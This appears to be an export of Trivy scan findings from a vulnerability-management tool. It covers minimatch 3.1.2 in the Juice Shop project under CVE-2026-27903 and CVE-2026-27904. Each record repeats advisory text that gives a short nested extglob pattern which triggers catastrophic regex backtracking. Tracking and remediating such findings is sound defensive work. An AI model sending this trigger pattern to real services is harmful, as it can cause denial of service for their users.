NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json,,True,,False,False,,False,,721b20e644b18dd53a1b0019098d6e2f61f590ace522dc66799f682ecb6ee02c,152,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.293781+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.293727+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.297479+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. 
This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,153,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.297533+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 
NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.297487+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.301466+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/archiver/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,154,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.301528+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.301477+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.305877+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/file-js/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,155,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.305932+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.305885+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.309919+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/fstream/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,156,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.309996+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.309929+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.314200+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,157,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.314254+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.314208+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.317794+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,158,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.317872+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.317808+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.322132+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/rimraf/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,159,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.322189+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.322141+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice 
Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,3.1.2,2026-05-12 17:37:05.326301+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json,,True,,False,False,,False,,fb8058c08a4c292b7af2c37eeea1292e7ef8971c5a61c424de271a3bd96a734a,160,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.326354+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 